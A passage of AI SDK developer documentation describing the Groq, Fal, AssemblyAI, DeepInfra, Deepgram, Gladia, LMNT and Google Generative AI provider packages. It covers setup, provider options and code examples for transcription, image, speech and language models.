Transcription Models
You can create models that call the Groq transcription API
using the .transcription() factory method.
The first argument is the model id e.g. whisper-large-v3.
const model = groq.transcription('whisper-large-v3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { groq } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: groq.transcription('whisper-large-v3'),
audio: await readFile('audio.mp3'),
providerOptions: { groq: { language: 'en' } },
});
The following provider options are available:
-
timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to
['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency. -
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
-
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
-
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-large-v3 | | | | |
| whisper-large-v3-turbo | | | | |
| distil-whisper-large-v3-en | | | | |
title: Fal description: Learn how to use Fal AI models with the AI SDK.
Fal Provider
Fal AI provides a generative media platform for developers with lightning-fast inference capabilities. Their platform offers optimized performance for running diffusion models, with speeds up to 4x faster than alternatives.
Setup
The Fal provider is available via the @ai-sdk/fal module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance fal from @ai-sdk/fal:
import { fal } from '@ai-sdk/fal';
If you need a customized setup, you can import createFal and create a provider instance with your settings:
import { createFal } from '@ai-sdk/fal';
const fal = createFal({
apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Fal provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://fal.run. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the FAL_API_KEY environment variable, falling back to FAL_KEY. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Fal image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { fal } from '@ai-sdk/fal';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';
const { image } = await generateImage({
model: fal.image('fal-ai/fast-sdxl'),
prompt: 'A serene mountain landscape at sunset',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Model Capabilities
Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI documentation.
| Model | Description |
|---|---|
| fal-ai/fast-sdxl | High-speed SDXL model optimized for quick inference with up to 4x faster speeds |
| fal-ai/flux-pro/kontext | FLUX.1 Kontext [pro] handles both text and reference images as inputs, seamlessly enabling targeted, local edits and complex transformations of entire scenes |
| fal-ai/flux-pro/kontext/max | FLUX.1 Kontext [max] with greatly improved prompt adherence and typography generation, meeting premium consistency for editing without compromise on speed |
| fal-ai/flux-lora | Super fast endpoint for the FLUX.1 [dev] model with LoRA support, enabling rapid and high-quality image generation using pre-trained LoRA adaptations |
| fal-ai/flux-pro/v1.1-ultra | Professional-grade image generation with up to 2K resolution and enhanced photorealism |
| fal-ai/ideogram/v2 | Specialized for high-quality posters and logos with exceptional typography handling |
| fal-ai/recraft-v3 | SOTA in image generation with vector art and brand style capabilities |
| fal-ai/stable-diffusion-3.5-large | Advanced MMDiT model with improved typography and complex prompt understanding |
| fal-ai/hyper-sdxl | Performance-optimized SDXL variant with enhanced creative capabilities |
Fal models support the following aspect ratios:
- 1:1 (square HD)
- 16:9 (landscape)
- 9:16 (portrait)
- 4:3 (landscape)
- 3:4 (portrait)
- 16:10 (1280x800)
- 10:16 (800x1280)
- 21:9 (2560x1080)
- 9:21 (1080x2560)
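For example, a sketch of requesting a landscape image with one of the ratios above:

import { fal } from '@ai-sdk/fal';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: fal.image('fal-ai/fast-sdxl'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
});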
Key features of Fal models include:
- Up to 4x faster inference speeds compared to alternatives
- Optimized by the Fal Inference Engine™
- Support for real-time infrastructure
- Cost-effective scaling with pay-per-use pricing
- LoRA training capabilities for model personalization
Modify Image
Transform existing images using text prompts.
// Example: Modify existing image
await generateImage({
model: fal.image('fal-ai/flux-pro/kontext'),
prompt: 'Put a donut next to the flour.',
providerOptions: {
fal: {
image_url:
'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
},
},
});
Advanced Features
Fal's platform offers several advanced capabilities:
- Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
- LoRA Training: Train and personalize models in under 5 minutes
- Real-time Infrastructure: Enable new user experiences with fast inference times
- Scalable Architecture: Scale to thousands of GPUs when needed
For more details about Fal's capabilities and features, visit the Fal AI documentation.
Transcription Models
You can create models that call the Fal transcription API
using the .transcription() factory method.
The first argument is the model id without the fal-ai/ prefix e.g. wizper.
const model = fal.transcription('wizper');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the batchSize option will increase the number of audio chunks processed in parallel.
import { experimental_transcribe as transcribe } from 'ai';
import { fal } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: fal.transcription('wizper'),
audio: await readFile('audio.mp3'),
providerOptions: { fal: { batchSize: 10 } },
});
The following provider options are available:
-
language string Language of the audio file. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
-
diarize boolean Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
-
chunkLevel string Level of the chunks to return. Either 'segment' or 'word'. Default value: "word" Optional.
-
version string Version of the model to use. All models are Whisper large variants. Default value: "3" Optional.
-
batchSize number Batch size for processing. Default value: 64 Optional.
-
numSpeakers number Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.
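A sketch combining several of these options to diarize a two-speaker recording with word-level chunks (file path and speaker count are placeholders):

import { experimental_transcribe as transcribe } from 'ai';
import { fal } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: fal.transcription('wizper'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    fal: { diarize: true, numSpeakers: 2, chunkLevel: 'word' },
  },
});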
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper | | | | |
| wizper | | | | |
title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.
AssemblyAI Provider
The AssemblyAI provider contains language model support for the AssemblyAI transcription API.
Setup
The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance assemblyai from @ai-sdk/assemblyai:
import { assemblyai } from '@ai-sdk/assemblyai';
If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:
import { createAssemblyAI } from '@ai-sdk/assemblyai';
const assemblyai = createAssemblyAI({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the AssemblyAI provider instance:
-
apiKey string
API key that is being sent using the
Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the AssemblyAI transcription API
using the .transcription() factory method.
The first argument is the model id e.g. best.
const model = assemblyai.transcription('best');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.
import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: assemblyai.transcription('best'),
audio: await readFile('audio.mp3'),
providerOptions: { assemblyai: { contentSafety: true } },
});
The following provider options are available:
-
audioEndAt number
End time of the audio in milliseconds. Optional.
-
audioStartFrom number
Start time of the audio in milliseconds. Optional.
-
autoChapters boolean
Whether to automatically generate chapters for the transcription. Optional.
-
autoHighlights boolean
Whether to automatically generate highlights for the transcription. Optional.
-
boostParam enum
Boost parameter for the transcription. Allowed values:
'low', 'default', 'high'. Optional. -
contentSafety boolean
Whether to enable content safety filtering. Optional.
-
contentSafetyConfidence number
Confidence threshold for content safety filtering (25-100). Optional.
-
customSpelling array of objects
Custom spelling rules for the transcription. Each object has
from (array of strings) and to (string) properties. Optional. -
disfluencies boolean
Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
-
entityDetection boolean
Whether to detect entities in the transcription. Optional.
-
filterProfanity boolean
Whether to filter profanity in the transcription. Optional.
-
formatText boolean
Whether to format the text in the transcription. Optional.
-
iabCategories boolean
Whether to include IAB categories in the transcription. Optional.
-
languageCode string
Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
-
languageConfidenceThreshold number
Confidence threshold for language detection. Optional.
-
languageDetection boolean
Whether to enable language detection. Optional.
-
multichannel boolean
Whether to process multiple audio channels separately. Optional.
-
punctuate boolean
Whether to add punctuation to the transcription. Optional.
-
redactPii boolean
Whether to redact personally identifiable information. Optional.
-
redactPiiAudio boolean
Whether to redact PII in the audio file. Optional.
-
redactPiiAudioQuality enum
Quality of the redacted audio file. Allowed values:
'mp3', 'wav'. Optional. -
redactPiiPolicies array of enums
Policies for PII redaction, specifying which types of information to redact. Supports numerous types like
'person_name', 'phone_number', etc. Optional. -
redactPiiSub enum
Substitution method for redacted PII. Allowed values:
'entity_name', 'hash'. Optional. -
sentimentAnalysis boolean
Whether to perform sentiment analysis on the transcription. Optional.
-
speakerLabels boolean
Whether to label different speakers in the transcription. Optional.
-
speakersExpected number
Expected number of speakers in the audio. Optional.
-
speechThreshold number
Threshold for speech detection (0-1). Optional.
-
summarization boolean
Whether to generate a summary of the transcription. Optional.
-
summaryModel enum
Model to use for summarization. Allowed values:
'informative', 'conversational', 'catchy'. Optional. -
summaryType enum
Type of summary to generate. Allowed values:
'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional. -
topics array of strings
List of topics to detect in the transcription. Optional.
-
webhookAuthHeaderName string
Name of the authentication header for webhook requests. Optional.
-
webhookAuthHeaderValue string
Value of the authentication header for webhook requests. Optional.
-
webhookUrl string
URL to send webhook notifications to. Optional.
-
wordBoost array of strings
List of words to boost in the transcription. Optional.
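A sketch combining a few of these options, assuming a two-speaker recording (file path is a placeholder):

import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    assemblyai: {
      speakerLabels: true,
      speakersExpected: 2,
      summarization: true,
      summaryType: 'bullets',
    },
  },
});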
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| best | | | | |
| nano | | | | |
title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.
DeepInfra Provider
The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.
Setup
The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with:
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance deepinfra from @ai-sdk/deepinfra:
import { deepinfra } from '@ai-sdk/deepinfra';
If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:
import { createDeepInfra } from '@ai-sdk/deepinfra';
const deepinfra = createDeepInfra({
apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepInfra provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.deepinfra.com/v1/openai. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
DeepInfra language models can also be used in the streamText function (see AI SDK Core).
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 | | | | |
| meta-llama/Llama-4-Scout-17B-16E-Instruct | | | | |
| meta-llama/Llama-3.3-70B-Instruct-Turbo | | | | |
| meta-llama/Llama-3.3-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-405B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct | | | | |
| meta-llama/Llama-3.2-11B-Vision-Instruct | | | | |
| meta-llama/Llama-3.2-90B-Vision-Instruct | | | | |
| mistralai/Mixtral-8x7B-Instruct-v0.1 | | | | |
| deepseek-ai/DeepSeek-V3 | | | | |
| deepseek-ai/DeepSeek-R1 | | | | |
| deepseek-ai/DeepSeek-R1-Distill-Llama-70B | | | | |
| deepseek-ai/DeepSeek-R1-Turbo | | | | |
| nvidia/Llama-3.1-Nemotron-70B-Instruct | | | | |
| Qwen/Qwen2-7B-Instruct | | | | |
| Qwen/Qwen2.5-72B-Instruct | | | | |
| Qwen/Qwen2.5-Coder-32B-Instruct | | | | |
| Qwen/QwQ-32B-Preview | | | | |
| google/codegemma-7b-it | | | | |
| google/gemma-2-9b-it | | | | |
| microsoft/WizardLM-2-8x22B | | | | |
Image Models
You can create DeepInfra image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Model-specific options
You can pass model-specific parameters using the providerOptions.deepinfra field:
import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
providerOptions: {
deepinfra: {
num_inference_steps: 30, // Control the number of denoising steps (1-50)
},
},
});
Model Capabilities
For models supporting aspect ratios, the following ratios are typically supported:
1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
For models supporting size parameters, dimensions must typically be:
- Multiples of 32
- Width and height between 256 and 1440 pixels
- Default size is 1024x1024
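For example, a sketch of requesting an explicit size from a size-based model (the model choice here is illustrative):

import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('black-forest-labs/FLUX-1-schnell'),
  prompt: 'A futuristic cityscape at sunset',
  size: '1024x1024', // multiples of 32, between 256 and 1440 per side
});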
| Model | Dimensions Specification | Notes |
|---|---|---|
| stabilityai/sd3.5 | Aspect Ratio | Premium quality base model, 8B parameters |
| black-forest-labs/FLUX-1.1-pro | Size | Latest state-of-art model with superior prompt following |
| black-forest-labs/FLUX-1-schnell | Size | Fast generation in 1-4 steps |
| black-forest-labs/FLUX-1-dev | Size | Optimized for anatomical accuracy |
| black-forest-labs/FLUX-pro | Size | Flagship Flux model |
| stabilityai/sd3.5-medium | Aspect Ratio | Balanced 2.5B parameter model |
| stabilityai/sdxl-turbo | Aspect Ratio | Optimized for fast generation |
For more details and pricing information, see the DeepInfra text-to-image models page.
title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.
Deepgram Provider
The Deepgram provider contains language model support for the Deepgram transcription API.
Setup
The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance deepgram from @ai-sdk/deepgram:
import { deepgram } from '@ai-sdk/deepgram';
If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:
import { createDeepgram } from '@ai-sdk/deepgram';
const deepgram = createDeepgram({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Deepgram provider instance:
-
apiKey string
API key that is being sent using the
Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Deepgram transcription API
using the .transcription() factory method.
The first argument is the model id e.g. nova-3.
const model = deepgram.transcription('nova-3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: deepgram.transcription('nova-3'),
audio: await readFile('audio.mp3'),
providerOptions: { deepgram: { summarize: true } },
});
The following provider options are available:
-
language string
Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
-
smartFormat boolean
Whether to apply smart formatting to the transcription. Optional.
-
punctuate boolean
Whether to add punctuation to the transcription. Optional.
-
paragraphs boolean
Whether to format the transcription into paragraphs. Optional.
-
summarize enum | boolean
Whether to generate a summary of the transcription. Allowed values:
'v2', false. Optional. -
topics boolean
Whether to detect topics in the transcription. Optional.
-
intents boolean
Whether to detect intents in the transcription. Optional.
-
sentiment boolean
Whether to perform sentiment analysis on the transcription. Optional.
-
detectEntities boolean
Whether to detect entities in the transcription. Optional.
-
redact string | array of strings
Specifies what content to redact from the transcription. Optional.
-
replace string
Replacement string for redacted content. Optional.
-
search string
Search term to find in the transcription. Optional.
-
keyterm string
Key terms to identify in the transcription. Optional.
-
diarize boolean
Whether to identify different speakers in the transcription. Defaults to
true. Optional. -
utterances boolean
Whether to segment the transcription into utterances. Optional.
-
uttSplit number
Threshold for splitting utterances. Optional.
-
fillerWords boolean
Whether to include filler words (um, uh, etc.) in the transcription. Optional.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| nova-3 (+ variants) | | | | |
| nova-2 (+ variants) | | | | |
| nova (+ variants) | | | | |
| enhanced (+ variants) | | | | |
| base (+ variants) | | | | |
title: Gladia description: Learn how to use the Gladia provider for the AI SDK.
Gladia Provider
The Gladia provider contains language model support for the Gladia transcription API.
Setup
The Gladia provider is available in the @ai-sdk/gladia module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance gladia from @ai-sdk/gladia:
import { gladia } from '@ai-sdk/gladia';
If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:
import { createGladia } from '@ai-sdk/gladia';
const gladia = createGladia({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Gladia provider instance:
- `apiKey` (string): API key that is being sent using the `Authorization` header. It defaults to the `GLADIA_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Gladia transcription API
using the .transcription() factory method.
const model = gladia.transcription();
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: gladia.transcription(),
audio: await readFile('audio.mp3'),
providerOptions: { gladia: { summarize: true } },
});
The following provider options are available:
- `contextPrompt` (string): Context to feed the transcription model with for possibly better accuracy. Optional.
- `customVocabulary` (boolean | any[]): Custom vocabulary to improve transcription accuracy. Optional.
- `customVocabularyConfig` (object): Configuration for custom vocabulary. Optional.
  - `vocabulary` (Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>)
  - `defaultIntensity` (number)
- `detectLanguage` (boolean): Whether to automatically detect the language. Optional.
- `enableCodeSwitching` (boolean): Enable code switching for multilingual audio. Optional.
- `codeSwitchingConfig` (object): Configuration for code switching. Optional.
  - `languages` (string[])
- `language` (string): Specify the language of the audio. Optional.
- `callback` (boolean): Enable a callback when transcription is complete. Optional.
- `callbackConfig` (object): Configuration for the callback. Optional.
  - `url` (string)
  - `method` ('POST' | 'PUT')
- `subtitles` (boolean): Generate subtitles from the transcription. Optional.
- `subtitlesConfig` (object): Configuration for subtitles. Optional.
  - `formats` (Array<'srt' | 'vtt'>)
  - `minimumDuration` (number)
  - `maximumDuration` (number)
  - `maximumCharactersPerRow` (number)
  - `maximumRowsPerCaption` (number)
  - `style` ('default' | 'compliance')
- `diarization` (boolean): Enable speaker diarization. Defaults to `true`. Optional.
- `diarizationConfig` (object): Configuration for diarization. Optional.
  - `numberOfSpeakers` (number)
  - `minSpeakers` (number)
  - `maxSpeakers` (number)
  - `enhanced` (boolean)
- `translation` (boolean): Enable translation of the transcription. Optional.
- `translationConfig` (object): Configuration for translation. Optional.
  - `targetLanguages` (string[])
  - `model` ('base' | 'enhanced')
  - `matchOriginalUtterances` (boolean)
- `summarization` (boolean): Enable summarization of the transcription. Optional.
- `summarizationConfig` (object): Configuration for summarization. Optional.
  - `type` ('general' | 'bullet_points' | 'concise')
- `moderation` (boolean): Enable content moderation. Optional.
- `namedEntityRecognition` (boolean): Enable named entity recognition. Optional.
- `chapterization` (boolean): Enable chapterization of the transcription. Optional.
- `nameConsistency` (boolean): Enable name consistency in the transcription. Optional.
- `customSpelling` (boolean): Enable custom spelling. Optional.
- `customSpellingConfig` (object): Configuration for custom spelling. Optional.
  - `spellingDictionary` (Record<string, string[]>)
- `structuredDataExtraction` (boolean): Enable structured data extraction. Optional.
- `structuredDataExtractionConfig` (object): Configuration for structured data extraction. Optional.
  - `classes` (string[])
- `sentimentAnalysis` (boolean): Enable sentiment analysis. Optional.
- `audioToLlm` (boolean): Enable audio-to-LLM processing. Optional.
- `audioToLlmConfig` (object): Configuration for audio-to-LLM processing. Optional.
  - `prompts` (string[])
- `customMetadata` (Record<string, any>): Custom metadata to include with the request. Optional.
- `sentences` (boolean): Enable sentence detection. Optional.
- `displayMode` (boolean): Enable display mode. Optional.
- `punctuationEnhanced` (boolean): Enable enhanced punctuation. Optional.
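For instance, a sketch enabling diarization together with subtitle generation (the chosen values are illustrative):
import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    gladia: {
      diarization: true, // label different speakers
      subtitles: true,
      subtitlesConfig: { formats: ['srt'] }, // emit SRT subtitles
    },
  },
});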
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| Default | | | | |
title: LMNT description: Learn how to use the LMNT provider for the AI SDK.
LMNT Provider
The LMNT provider contains speech model support for the LMNT speech API.
Setup
The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with:
pnpm add @ai-sdk/lmnt
Provider Instance
You can import the default provider instance lmnt from @ai-sdk/lmnt:
import { lmnt } from '@ai-sdk/lmnt';
If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:
import { createLMNT } from '@ai-sdk/lmnt';
const lmnt = createLMNT({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the LMNT provider instance:
- `apiKey` (string): API key that is being sent using the `Authorization` header. It defaults to the `LMNT_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the LMNT speech API
using the .speech() factory method.
The first argument is the model id, e.g. aurora.
const model = lmnt.speech('aurora');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const result = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hello, world!',
providerOptions: { lmnt: { language: 'en' } },
});
Provider Options
The LMNT provider accepts the following options:
- `model` ('aurora' | 'blizzard'): The LMNT model to use. Defaults to `'aurora'`.
- `language` ('auto' | 'en' | 'es' | 'pt' | 'fr' | 'de' | 'zh' | 'ko' | 'hi' | 'ja' | 'ru' | 'it' | 'tr'): The language to use for speech synthesis. Defaults to `'auto'`.
- `format` ('aac' | 'mp3' | 'mulaw' | 'raw' | 'wav'): The audio format to return. Defaults to `'mp3'`.
- `sampleRate` (number): The sample rate of the audio in Hz. Defaults to `24000`.
- `speed` (number): The speed of the speech. Must be between 0.25 and 2. Defaults to `1`.
- `seed` (number): An optional seed for deterministic generation.
- `conversational` (boolean): Whether to use a conversational style. Defaults to `false`.
- `length` (number): Maximum length of the audio in seconds. Maximum value is 300.
- `topP` (number): Top-p sampling parameter. Must be between 0 and 1. Defaults to `1`.
- `temperature` (number): Temperature parameter for sampling. Must be at least 0. Defaults to `1`.
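As an illustrative sketch, several of these options can be combined in one call:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hello, world!',
  providerOptions: {
    lmnt: {
      language: 'en',
      format: 'wav', // return WAV instead of the default MP3
      speed: 1.25, // slightly faster than normal
      seed: 42, // deterministic generation
    },
  },
});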
Model Capabilities
| Model | Instructions |
|---|---|
| aurora | |
| blizzard | |
title: Google Generative AI description: Learn how to use Google Generative AI Provider.
Google Generative AI Provider
The Google Generative AI provider contains language and embedding model support for the Google Generative AI APIs.
Setup
The Google provider is available in the @ai-sdk/google module. You can install it with:
pnpm add @ai-sdk/google
Provider Instance
You can import the default provider instance google from @ai-sdk/google:
import { google } from '@ai-sdk/google';
If you need a customized setup, you can import createGoogleGenerativeAI from @ai-sdk/google and create a provider instance with your settings:
import { createGoogleGenerativeAI } from '@ai-sdk/google';
const google = createGoogleGenerativeAI({
// custom settings
});
You can use the following optional settings to customize the Google Generative AI provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://generativelanguage.googleapis.com/v1beta`.
- `apiKey` (string): API key that is being sent using the `x-goog-api-key` header. It defaults to the `GOOGLE_GENERATIVE_AI_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Google Generative AI API using the provider instance.
The first argument is the model id, e.g. gemini-1.5-pro-latest.
The models support tool calls and some have multi-modal capabilities.
const model = google('gemini-1.5-pro-latest');
Google Generative AI also supports some model specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = google('gemini-1.5-pro-latest', {
safetySettings: [
{ category: 'HARM_CATEGORY_UNSPECIFIED', threshold: 'BLOCK_LOW_AND_ABOVE' },
],
});
The following optional settings are available for Google Generative AI models:
- `cachedContent` (string): Optional. The name of the cached content used as context to serve the prediction. Format: `cachedContents/{cachedContent}`.
- `structuredOutputs` (boolean): Optional. Enable structured output. Default is `true`. This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Generative AI uses. You can use this to disable structured outputs if you need to. See Troubleshooting: Schema Limitations for more details.
- `safetySettings` (Array<{ category: string; threshold: string }>): Optional. Safety settings for the model.
  - `category` (string): The category of the safety setting. Can be one of the following:
    - `HARM_CATEGORY_HATE_SPEECH`
    - `HARM_CATEGORY_DANGEROUS_CONTENT`
    - `HARM_CATEGORY_HARASSMENT`
    - `HARM_CATEGORY_SEXUALLY_EXPLICIT`
  - `threshold` (string): The threshold of the safety setting. Can be one of the following:
    - `HARM_BLOCK_THRESHOLD_UNSPECIFIED`
    - `BLOCK_LOW_AND_ABOVE`
    - `BLOCK_MEDIUM_AND_ABOVE`
    - `BLOCK_ONLY_HIGH`
    - `BLOCK_NONE`
Further configuration can be done using Google Generative AI provider options. You can validate the provider options using the GoogleGenerativeAIProviderOptions type.
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-1.5-pro-latest'),
providerOptions: {
google: {
responseModalities: ['TEXT', 'IMAGE'],
} satisfies GoogleGenerativeAIProviderOptions,
},
// ...
});
Another example showing the use of provider options to specify the thinking budget for a Google Generative AI thinking model:
